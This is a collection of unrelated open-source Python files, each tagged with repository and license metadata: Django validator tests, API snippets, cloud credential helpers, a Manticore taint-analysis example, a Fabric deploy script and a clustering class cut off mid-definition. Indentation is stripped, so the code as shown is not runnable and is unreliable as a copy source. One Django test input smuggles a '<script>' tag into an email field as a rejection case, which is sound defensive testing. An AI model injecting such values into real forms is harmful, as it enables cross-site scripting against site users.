NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = (
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, None),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_email, 'email@here.com', None),
(validate_email, 'weirder-email@here.and.there.com', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, 'example@valid-----hyphens.com', None),
(validate_email, 'example@valid-with-hyphens.com', None),
(validate_email, 'test@domain.with.idn.tld.उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, 'abc@.com', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, 'email@127.0.0.1', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, 'example@invalid-.com', ValidationError),
(validate_email, 'example@-invalid.com', ValidationError),
(validate_email, 'example@invalid.com-', ValidationError),
(validate_email, 'example@inv-.alid-.com', ValidationError),
(validate_email, 'example@inv-.-alid.com', ValidationError),
(validate_email, 'test@example.com\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, 'trailingdot@shouldfail.com.', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, 'some@mail.com', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '1,2,3,', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(), 'http://www.djangoproject.com/', None),
(URLValidator(), 'HTTP://WWW.DJANGOPROJECT.COM/', None),
(URLValidator(), 'http://localhost/', None),
(URLValidator(), 'http://example.com/', None),
(URLValidator(), 'http://www.example.com/', None),
(URLValidator(), 'http://www.example.com:8000/test', None),
(URLValidator(), 'http://valid-with-hyphens.com/', None),
(URLValidator(), 'http://subdomain.example.com/', None),
(URLValidator(), 'http://200.8.9.10/', None),
(URLValidator(), 'http://200.8.9.10:8000/test', None),
(URLValidator(), 'http://valid-----hyphens.com/', None),
(URLValidator(), 'http://example.com?something=value', None),
(URLValidator(), 'http://example.com/index.php?something=value&another=value2', None),
(URLValidator(), 'https://example.com/', None),
(URLValidator(), 'ftp://example.com/', None),
(URLValidator(), 'ftps://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(), 'foo', ValidationError),
(URLValidator(), 'http://', ValidationError),
(URLValidator(), 'http://example', ValidationError),
(URLValidator(), 'http://example.', ValidationError),
(URLValidator(), 'http://.com', ValidationError),
(URLValidator(), 'http://invalid-.com', ValidationError),
(URLValidator(), 'http://-invalid.com', ValidationError),
(URLValidator(), 'http://invalid.com-', ValidationError),
(URLValidator(), 'http://inv-.alid-.com', ValidationError),
(URLValidator(), 'http://inv-.-alid.com', ValidationError),
(URLValidator(), 'file://localhost/path', ValidationError),
(URLValidator(), 'git://example.com/', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError),
(BaseValidator(True), True, None),
(BaseValidator(True), False, ValidationError),
(RegexValidator(), '', None),
(RegexValidator(), 'x1x2', None),
(RegexValidator('[0-9]+'), 'xxxxxx', ValidationError),
(RegexValidator('[0-9]+'), '1234', None),
(RegexValidator(re.compile('[0-9]+')), '1234', None),
(RegexValidator('.*'), '', None),
(RegexValidator(re.compile('.*')), '', None),
(RegexValidator('.*'), 'xxxxx', None),
(RegexValidator('x'), 'y', ValidationError),
(RegexValidator(re.compile('x')), 'y', ValidationError),
(RegexValidator('x', inverse_match=True), 'y', None),
(RegexValidator(re.compile('x'), inverse_match=True), 'y', None),
(RegexValidator('x', inverse_match=True), 'x', ValidationError),
(RegexValidator(re.compile('x'), inverse_match=True), 'x', ValidationError),
(RegexValidator('x', flags=re.IGNORECASE), 'y', ValidationError),
(RegexValidator('a'), 'A', ValidationError),
(RegexValidator('a', flags=re.IGNORECASE), 'A', None),
)
def create_simple_test_method(validator, expected, value, num):
if expected is not None and issubclass(expected, Exception):
test_mask = 'test_%s_raises_error_%d'
def test_func(self):
# assertRaises not used, so as to be able to produce an error message
# containing the tested value
try:
validator(value)
except expected:
pass
else:
self.fail("%s not raised when validating '%s'" % (
expected.__name__, value))
else:
test_mask = 'test_%s_%d'
def test_func(self):
try:
self.assertEqual(expected, validator(value))
except ValidationError as e:
self.fail("Validation of '%s' failed. Error message was: %s" % (
value, str(e)))
if isinstance(validator, types.FunctionType):
val_name = validator.__name__
else:
val_name = validator.__class__.__name__
test_name = test_mask % (val_name, num)
return test_name, test_func
# Dynamically assemble a test class with the contents of TEST_DATA
class TestSimpleValidators(TestCase):
def test_single_message(self):
v = ValidationError('Not Valid')
self.assertEqual(str(v), str_prefix("[%(_)s'Not Valid']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'Not Valid'])"))
def test_message_list(self):
v = ValidationError(['First Problem', 'Second Problem'])
self.assertEqual(str(v), str_prefix("[%(_)s'First Problem', %(_)s'Second Problem']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'First Problem', %(_)s'Second Problem'])"))
def test_message_dict(self):
v = ValidationError({'first': ['First Problem']})
self.assertEqual(str(v), str_prefix("{%(_)s'first': [%(_)s'First Problem']}"))
self.assertEqual(repr(v), str_prefix("ValidationError({%(_)s'first': [%(_)s'First Problem']})"))
def test_regex_validator_flags(self):
try:
RegexValidator(re.compile('a'), flags=re.IGNORECASE)
except TypeError:
pass
else:
self.fail("TypeError not raised when flags and pre-compiled regex in RegexValidator")
test_counter = 0
for validator, value, expected in TEST_DATA:
name, method = create_simple_test_method(validator, expected, value, test_counter)
setattr(TestSimpleValidators, name, method)
test_counter += 1
class TestValidatorEquality(TestCase):
"""
Tests that validators have valid equality operators (#21638)
"""
def test_regex_equality(self):
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[0-9\.\-]*)://'),
)
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator('', flags=re.IGNORECASE),
RegexValidator(''),
)
self.assertNotEqual(
RegexValidator(''),
RegexValidator('', inverse_match=True),
)
def test_regex_equality_nocache(self):
pattern = r'^(?:[a-z0-9\.\-]*)://'
left = RegexValidator(pattern)
re.purge()
right = RegexValidator(pattern)
self.assertEqual(
left,
right,
)
def test_regex_equality_blank(self):
self.assertEqual(
RegexValidator(),
RegexValidator(),
)
def test_email_equality(self):
self.assertEqual(
EmailValidator(),
EmailValidator(),
)
self.assertNotEqual(
EmailValidator(message="BAD EMAIL"),
EmailValidator(),
)
self.assertEqual(
EmailValidator(message="BAD EMAIL", code="bad"),
EmailValidator(message="BAD EMAIL", code="bad"),
)
def test_basic_equality(self):
self.assertEqual(
MaxValueValidator(44),
MaxValueValidator(44),
)
self.assertNotEqual(
MaxValueValidator(44),
MinValueValidator(44),
)
self.assertNotEqual(
MinValueValidator(45),
MinValueValidator(11),
)
|
wfxiang08/django178
|
tests/validators/tests.py
|
Python
|
bsd-3-clause
| 14,190 | 0.000918 |
#!/usr/bin/env python
# Install the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# To set up environmental variables, see http://twil.io/secure
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
client = Client(ACCOUNT_SID, AUTH_TOKEN)
notification = client.notify.services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.notifications.create(identity='00000001',
body='Hello Bob')
print(notification.sid)
|
TwilioDevEd/api-snippets
|
notifications/register/send-notification/send-notification.7.x.py
|
Python
|
mit
| 528 | 0 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Load plugin assets from disk."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
_PLUGINS_DIR = "plugins"
def _IsDirectory(parent, item):
"""Helper that returns if parent/item is a directory."""
return tf.gfile.IsDirectory(os.path.join(parent, item))
def PluginDirectory(logdir, plugin_name):
"""Returns the plugin directory for plugin_name."""
return os.path.join(logdir, _PLUGINS_DIR, plugin_name)
def ListPlugins(logdir):
"""List all the plugins that have registered assets in logdir.
If the plugins_dir does not exist, it returns an empty list. This maintains
compatibility with old directories that have no plugins written.
Args:
logdir: A directory that was created by a TensorFlow events writer.
Returns:
a list of plugin names, as strings
"""
plugins_dir = os.path.join(logdir, _PLUGINS_DIR)
if not tf.gfile.IsDirectory(plugins_dir):
return []
entries = tf.gfile.ListDirectory(plugins_dir)
return [x for x in entries if _IsDirectory(plugins_dir, x)]
def ListAssets(logdir, plugin_name):
"""List all the assets that are available for given plugin in a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: A string name of a plugin to list assets for.
Returns:
A string list of available plugin assets. If the plugin subdirectory does
not exist (either because the logdir doesn't exist, or because the plugin
didn't register) an empty list is returned.
"""
plugin_dir = PluginDirectory(logdir, plugin_name)
if not tf.gfile.IsDirectory(plugin_dir):
return []
entries = tf.gfile.ListDirectory(plugin_dir)
return [x for x in entries if not _IsDirectory(plugin_dir, x)]
def RetrieveAsset(logdir, plugin_name, asset_name):
"""Retrieve a particular plugin asset from a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: The plugin we want an asset from.
asset_name: The name of the requested asset.
Returns:
string contents of the plugin asset.
Raises:
KeyError: if the asset does not exist.
"""
asset_path = os.path.join(PluginDirectory(logdir, plugin_name), asset_name)
try:
with tf.gfile.Open(asset_path, "r") as f:
return f.read()
except tf.errors.NotFoundError:
raise KeyError("Asset path %s not found" % asset_path)
except tf.errors.OpError as e:
raise KeyError("Couldn't read asset path: %s, OpError %s" % (asset_path, e))
|
sjperkins/tensorflow
|
tensorflow/tensorboard/backend/event_processing/plugin_asset_util.py
|
Python
|
apache-2.0
| 3,278 | 0.006406 |
# -*- coding:utf-8 -*-
# @author yuding
# 2017-09-23
import re
import os
import shutil
import msvcrt
import traceback
def mkdir(path):
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
# 获得目标字符串
def getTargetData(fname):
# 先得到大致内容
nc = open(fname + '.gb')
str = nc.read()
nc.close()
# 去除干扰信息
str = re.sub(r'\.\.>', '..', str)
# 取CDS到protein_id="xxxx"之间内容
pattern = r'CDS.*?protein_id=".*?".*?gene=".*?"'
p = re.compile(pattern, re.S|re.I)
result = p.findall(str)
# 得到目标字符串 得到 "xxx..xxx protein_id里面内容"
newpattern = r'([\d]+?\.\.[\d]+,[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+).*protein_id="(.+?)".*gene="(.+?)"'
p2 = re.compile(newpattern, re.S|re.I)
# 数据存入字典中
dic = {}
geneDic = {}
for unit in result:
result2 = p2.findall(unit)
value = re.split(',', result2[0][0])
key = result2[0][1]
dic[key] = value
geneDic[key] = result2[0][2]
return (dic, geneDic)
# 获得替换的内容
def getContent(fname):
tf = open(fname + '.fasta')
first = tf.readline() #读取第一行,这一行不要
content = tf.read() #从第二行开始
# 删除头部和换行符
content = re.sub(r'\n', '', content)
tf.close()
return content
def getAllData2(dirname, fname, name):
(dic, geneDic) = getTargetData(fname)
content = getContent(fname)
fl = open(dirname + '\\' + name + '.txt', 'wb')
length = len(content)
for unit in dic:
pt = ''
for k in dic[unit]:
pt = pt + k + ','
lh = len(pt)
if lh > 0:
pt = pt[0:lh - 1]
fl.write('name = ' + name + ', protein_id = ' + unit + ', ' + 'gene = ' + geneDic[unit] + ', position = ' + pt + ":\n")
for k in dic[unit]:
# 字符串 content 是从0的下标开始
value = re.split(r'\.\.', k)
bg = int(value[0]) - 1
ed = int(value[1]) - 1
if bg > length - 1:
bg = length - 1
print 'begin beyond the max length'
if ed > length - 1:
print 'end beyond the max length' + ', length = ' + str(length) + ', ed = ' + str(ed)
ed = length - 1
final = content[bg : ed]
fl.write(final)
fl.write("\n")
fl.close()
def getPath():
# 从当前文件路径中获取目录
dname = os.path.dirname(os.path.realpath(__file__))
dname = dname + '\\source'
filelist = os.listdir(dname)
names = []
for filename in filelist:
rl = re.split(r'\.', filename)
names.append(rl[0])
names = list(set(names))
return names
def getPackageData():
curfile = os.path.dirname(os.path.realpath(__file__))
names = getPath()
# make dir
mkdir(curfile + '\\result')
shutil.rmtree(curfile + '\\result')
mkdir(curfile + '\\result')
log = open(curfile + '\\log.txt', 'wb')
log.write('result path: ' + curfile + '\\result' + '\n')
for name in names:
try:
getAllData2(curfile + '\\result', curfile + '\\source\\' + name, name)
print('analysis id = ' + name + ',success')
log.write('analysis id = ' + name + ',success' + '\n')
except Exception, e:
print('analysis id = ' + name + ',fail')
log.write('analysis id = ' + name + ',fail')
log.write('message: ' + e.message)
log.close()
print('analysis finish')
print("Press 'd' to exit...")
while True:
if ord(msvcrt.getch()) in [68, 100]:
break
def main():
getPackageData()
if __name__ == '__main__':
main()
|
yuuagh/pywork
|
20171127/go.py
|
Python
|
gpl-3.0
| 4,158 | 0.015506 |
"""
.. module:: area_attribute
The **Area Attribute** Model.
PostgreSQL Definition
---------------------
The :code:`area_attribute` table is defined in the MusicBrainz Server as:
.. code-block:: sql
CREATE TABLE area_attribute ( -- replicate (verbose)
id SERIAL, -- PK
area INTEGER NOT NULL, -- references area.id
area_attribute_type INTEGER NOT NULL, -- references area_attribute_type.id
area_attribute_type_allowed_value INTEGER, -- references area_attribute_type_allowed_value.id
area_attribute_text TEXT
CHECK (
(area_attribute_type_allowed_value IS NULL AND area_attribute_text IS NOT NULL)
OR
(area_attribute_type_allowed_value IS NOT NULL AND area_attribute_text IS NULL)
)
);
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from ..signals import pre_save_model_attribute
@python_2_unicode_compatible
class area_attribute(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
:param area: References :class:`area`
:param area_attribute_type: References :class:`area_attribute_type`
:param area_attribute_type_allowed_value: References :class:`area_attribute_type_allowed_value`.
"""
id = models.AutoField(primary_key=True)
area = models.ForeignKey('area')
area_attribute_type = models.ForeignKey('area_attribute_type')
area_attribute_type_allowed_value = models.ForeignKey('area_attribute_type_allowed_value', null=True)
area_attribute_text = models.TextField(null=True)
def __str__(self):
return 'Area Attribute'
class Meta:
db_table = 'area_attribute'
models.signals.pre_save.connect(pre_save_model_attribute, sender=area_attribute)
|
marios-zindilis/musicbrainz-django-models
|
musicbrainz_django_models/models/area_attribute.py
|
Python
|
gpl-2.0
| 1,946 | 0.004111 |
# -*- coding: utf-8 -*-
import time
import requests
import json
import logging
import threading
from .exceptions import ClientError
from .utils import to_unixtime
from .compat import to_unicode
logger = logging.getLogger(__name__)
class Credentials(object):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS = 3600 * 6
DEFAULT_ECS_SESSION_EXPIRED_FACTOR = 0.85
class EcsRamRoleCredential(Credentials):
def __init__(self,
access_key_id,
access_key_secret,
security_token,
expiration,
duration,
expired_factor=None):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
self.expiration = expiration
self.duration = duration
self.expired_factor = expired_factor or DEFAULT_ECS_SESSION_EXPIRED_FACTOR
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
def will_soon_expire(self):
now = int(time.time())
return self.duration * (1.0 - self.expired_factor) > self.expiration - now
class CredentialsProvider(object):
def get_credentials(self):
return
class StaticCredentialsProvider(CredentialsProvider):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.credentials = Credentials(access_key_id, access_key_secret, security_token)
def get_credentials(self):
return self.credentials
class EcsRamRoleCredentialsProvider(CredentialsProvider):
def __init__(self, auth_host, max_retries=3, timeout=10):
self.fetcher = EcsRamRoleCredentialsFetcher(auth_host)
self.max_retries = max_retries
self.timeout = timeout
self.credentials = None
self.__lock = threading.Lock()
def get_credentials(self):
if self.credentials is None or self.credentials.will_soon_expire():
with self.__lock:
if self.credentials is None or self.credentials.will_soon_expire():
try:
self.credentials = self.fetcher.fetch(self.max_retries, self.timeout)
except Exception as e:
logger.error("Exception: {0}".format(e))
if self.credentials is None:
raise
return self.credentials
class EcsRamRoleCredentialsFetcher(object):
def __init__(self, auth_host):
self.auth_host = auth_host
def fetch(self, retry_times=3, timeout=10):
for i in range(0, retry_times):
try:
response = requests.get(self.auth_host, timeout=timeout)
if response.status_code != 200:
raise ClientError(
"Failed to fetch credentials url, http code:{0}, msg:{1}".format(response.status_code,
response.text))
dic = json.loads(to_unicode(response.content))
code = dic.get('Code')
access_key_id = dic.get('AccessKeyId')
access_key_secret = dic.get('AccessKeySecret')
security_token = dic.get('SecurityToken')
expiration_date = dic.get('Expiration')
last_updated_date = dic.get('LastUpdated')
if code != "Success":
raise ClientError("Get credentials from ECS metadata service error, code: {0}".format(code))
expiration_stamp = to_unixtime(expiration_date, "%Y-%m-%dT%H:%M:%SZ")
duration = DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS
if last_updated_date is not None:
last_updated_stamp = to_unixtime(last_updated_date, "%Y-%m-%dT%H:%M:%SZ")
duration = expiration_stamp - last_updated_stamp
return EcsRamRoleCredential(access_key_id, access_key_secret, security_token, expiration_stamp,
duration, DEFAULT_ECS_SESSION_EXPIRED_FACTOR)
except Exception as e:
if i == retry_times - 1:
logger.error("Exception: {0}".format(e))
raise ClientError("Failed to get credentials from ECS metadata service. {0}".format(e))
|
aliyun/aliyun-oss-python-sdk
|
oss2/credentials.py
|
Python
|
mit
| 4,941 | 0.003036 |
GnuXzPackage ('clutter', '1.10.6',
sources = [ 'http://source.clutter-project.org/sources/clutter/1.10/%{name}-%{version}.tar.xz' ],
)
|
bl8/bockbuild
|
packages/clutter.py
|
Python
|
mit
| 136 | 0.058824 |
#!/usr/bin/env python
import sys
from manticore import issymbolic
from manticore.native import Manticore
"""
Replaces a variable that controls program flow with a tainted symbolic value. This
in turn explores all possible states under that variable's influence, and reports the
specific cmp/test instructions can be influenced by tainted data.
Usage:
$ gcc -static -g src/state_explore.c -o state_explore # -static is optional
$ ADDRESS=0x$(objdump -S state_explore | grep -A 1 '((value & 0xff) != 0)' |
tail -n 1 | sed 's|^\s*||g' | cut -f1 -d:)
$ python ./introduce_symbolic_bytes.py state_explore $ADDRESS
Tainted Control Flow:
introducing symbolic value to 7ffffffffd44
400a0e: test eax, eax
400a19: cmp eax, 0x3f
400b17: test eax, eax
400b1e: cmp eax, 0x1000
400b63: test eax, eax
400a3e: cmp eax, 0x41
400a64: cmp eax, 0x42
400a8a: cmp eax, 0x43
400ab0: cmp eax, 0x44
400b6a: cmp eax, 0xf0000
Analysis finished. See ./mcore_cz3Jzp for results.
"""
if __name__ == "__main__":
if len(sys.argv) < 3:
sys.stderr.write(f"Usage: {sys.argv[0]} [binary] [address]\n")
sys.exit(2)
# Passing a parameter to state_explore binary disables reading the value
# from STDIN, and relies on us adding it manually
m = Manticore(sys.argv[1], ["anything"])
# Uncomment to see debug output
# m.verbosity = 2
# Set to the address of the instruction before the first conditional.
introduce_at = int(sys.argv[2], 0)
taint_id = "taint_A"
@m.hook(introduce_at)
def introduce_sym(state):
# RBP-0xC is the location of the value we're interested in:
#
# if ((value & 0xff) != 0) {
# 400a08: 8b 45 f4 mov -0xc(%rbp),%eax
# 400a0b: 0f b6 c0 movzbl %al,%eax
# 400a0e: 85 c0 test %eax,%eax
#
print(f"introducing symbolic value to {state.cpu.RBP-0xc:x}")
val = state.new_symbolic_value(32, taint=(taint_id,))
state.cpu.write_int(state.cpu.RBP - 0xC, val, 32)
def has_tainted_operands(operands, taint_id):
# type: (list[manticore.core.cpu.abstractcpu.Operand], object) -> bool
for operand in operands:
op = operand.read()
if issymbolic(op) and taint_id in op.taint:
return True
return False
every_instruction = None
@m.hook(every_instruction)
def check_taint(state):
insn = state.cpu.instruction # type: capstone.CsInsn
if insn is None:
return
if insn.mnemonic in ("cmp", "test"):
if has_tainted_operands(insn.operands, taint_id):
print(f"{insn.address:x}: {insn.mnemonic} {insn.op_str}")
print("Tainted Control Flow:")
m.run()
print(f"Analysis finished. See {m.workspace} for results.")
|
montyly/manticore
|
examples/script/introduce_symbolic_bytes.py
|
Python
|
apache-2.0
| 2,875 | 0.001043 |
# Fabric file for the health monitor.
#
# This should only be used for deployment tasks. make should be
# sufficient for development.
import os
from fabric.api import env, task, roles, lcd, local, run, put
BASE_DIR = os.path.dirname(__file__)
env.path = ":".join([
'/home/forcer/bin/',
os.path.join(BASE_DIR, "node_modules/.bin/")
])
env.roledefs = {
'production': ['healthmonitor@loki']
}
@task
@roles('production')
def deploy():
run("test -d venv || pyvenv-3.4 venv")
run("test -f venv/lib/python3.4/site-packages/_healthmonitor.pth || "
"echo $HOME/lib > venv/lib/python3.4/site-packages/_healthmonitor.pth")
run("mkdir -p health.jorgenschaefer.de/static/")
run("mkdir -p lib/")
local("git archive -o deploy.tar.gz HEAD")
put("deploy.tar.gz")
local("rm deploy.tar.gz")
run("tar -C lib/ -xzf deploy.tar.gz")
run("rm deploy.tar.gz")
local("bower install --production")
local("tar -c bower_components/ "
"-zf bower_components.tar.gz")
put("bower_components.tar.gz")
local("rm bower_components.tar.gz")
run("tar -C lib -xzf bower_components.tar.gz")
run("rm bower_components.tar.gz")
local("make compress")
local("tar -C static -c CACHE -zf compressed_cache.tar.gz")
put("compressed_cache.tar.gz")
local("rm compressed_cache.tar.gz")
run("tar -C health.jorgenschaefer.de/static/ -xzf compressed_cache.tar.gz")
run("rm compressed_cache.tar.gz")
run("venv/bin/pip install -qr lib/requirements.txt")
run("venv/bin/django-admin migrate --noinput "
"--settings=healthmonitor.settings_production")
run("venv/bin/django-admin collectstatic --noinput "
"--settings=healthmonitor.settings_production")
run("sudo /usr/bin/supervisorctl restart healthmonitor")
|
jorgenschaefer/healthmonitor
|
fabfile.py
|
Python
|
agpl-3.0
| 1,805 | 0 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
'''
import warnings
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import fix_docs
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
@fix_docs
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
__serialize_version = 0
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None, skip=0):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
Voronoi partioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self._converged = False
self.set_params(dmin=dmin, metric=metric,
max_centers=max_centers, stride=stride, skip=skip)
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
d = float(d)
if d < 0:
raise ValueError("d has to be positive")
self._dmin = d
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
value = int(value)
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = value
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
